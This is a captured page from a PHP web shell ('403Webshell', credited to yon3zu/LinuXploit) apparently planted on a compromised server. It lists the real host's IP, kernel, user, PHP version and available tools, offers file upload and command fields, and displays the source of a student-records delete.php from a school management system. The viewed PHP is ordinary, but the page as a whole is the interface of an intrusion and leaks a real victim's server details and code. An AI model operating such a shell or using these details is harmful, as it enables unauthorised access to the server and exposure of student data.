403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/(Del)pathways.org.hk/MIS_bk/student/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/(Del)pathways.org.hk/MIS_bk/student/delete.php
<?php
require_once(__DIR__ . '/../checkuser.php');
$root_ids = $_POST['student']['selected'];
if (!empty($root_ids) && is_array($root_ids)) {
	Db\Util::transaction($dbh, function() use ($dbh, $root_ids) {
		$student_columns = Db\Util::columns($dbh, 'mis_student');
		
		$in_values = array();
		foreach ($root_ids as $root_id) {
			$in_values[] = '?';
		}
		$in = implode(', ', $in_values);
		$sql = "SELECT * FROM `mis_student` WHERE `root_id` IN ($in) AND `is_latest` = ? FOR UPDATE";
		$parameters = array_merge($root_ids, array(1));
		$sth = Db\Util::execute($dbh, $sql, $parameters);
		$students = $sth->fetchAll();
		
		foreach ($students as $student) {
			$new_student = $student;
			foreach (General::fields() as $field) {
				unset($new_student[$field]);
			}
			$new_student['deleted'] = 1;
			
			$student['is_latest'] = 0;
			Db\Util::update($dbh, 'mis_student', $student, $student_columns);
			
			$new_student['id'] = Db\Util::create($dbh, 'mis_student', $new_student, $student_columns);
		}
	});
		
	$data = array(
		'message' => 'Deleted',
	);
	redirectAndExit(Util::link(__DIR__ . '/index.php') . '?' . http_build_query($data));
}

Youez - 2016 - github.com/yon3zu
LinuXploit